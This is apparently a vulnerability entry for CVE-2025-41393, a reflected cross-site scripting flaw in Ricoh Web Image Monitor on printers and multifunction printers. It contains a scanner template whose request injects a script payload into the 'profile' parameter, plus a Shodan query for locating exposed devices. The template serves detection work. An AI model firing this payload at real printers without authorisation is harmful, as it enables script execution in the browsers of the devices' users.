A reflected cross-site scripting vulnerability exists in the laser printers and MFPs (multifunction printers) which implement Ricoh Web Image Monitor. If exploited, an arbitrary script may be executed on the web browser of the user who accessed Web Image Monitor.
PoC代码[已公开]
id: CVE-2025-41393
info:
name: Ricoh Web Image Monitor - Reflected XSS
author: jpg0mez
severity: medium
description: |
A reflected cross-site scripting vulnerability exists in the laser printers and MFPs (multifunction printers) which implement Ricoh Web Image Monitor. If exploited, an arbitrary script may be executed on the web browser of the user who accessed Web Image Monitor.
reference:
- https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2025-000001
- https://jvn.jp/en/jp/JVN20474768/
- https://nvd.nist.gov/vuln/detail/CVE-2025-41393
classification:
epss-score: 0.00692
epss-percentile: 0.71138
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: http.html:"Web Image Monitor"
tags: cve,cve2025,ricoh,xss,web,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?profile=</script><script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'websys/webArch/mainFrame.cgi'
- 'Web Image Monitor'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100ad3553226d66876748c01949d44960ed2a29a5cd78f19e934fa8e16324e56e1c02202944a33835af4c7a2c8c19416aab62789aa1435939648d5ae655b2450142a9d7:922c64590222798bb761d5b6d8e72950